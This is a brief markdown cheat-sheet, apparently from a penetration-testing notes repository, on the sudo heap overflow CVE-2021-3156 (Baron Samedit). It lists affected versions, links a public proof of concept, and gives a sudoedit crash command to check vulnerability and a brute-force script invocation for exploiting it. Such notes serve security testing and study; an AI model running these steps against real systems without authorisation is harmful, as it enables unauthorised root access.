killchain-compendium/exploit/linux/sudo/baron_samedit.md

# CVE-2021-3156 Baron Samedit

* [Animesh Jain's blog post on Qualys](https://blog.qualys.com/vulnerabilities-research/2021/01/26/cve-2021-3156-heap-based-buffer-overflow-in-sudo-baron-samedit)
* [blasty's PoC](https://github.com/blasty/CVE-2021-3156.git)
* Heap based overflow
* Versions 1.8.2-1.8.31p2, 1.9.0-1.9.5p1
* Check vulnerability via
```sh
sudoedit -s '\' $(python -c "print('\x41' * 10000)")
```
* Defaults to try
```sh
./brute.sh 90 120 50 70 150 300
```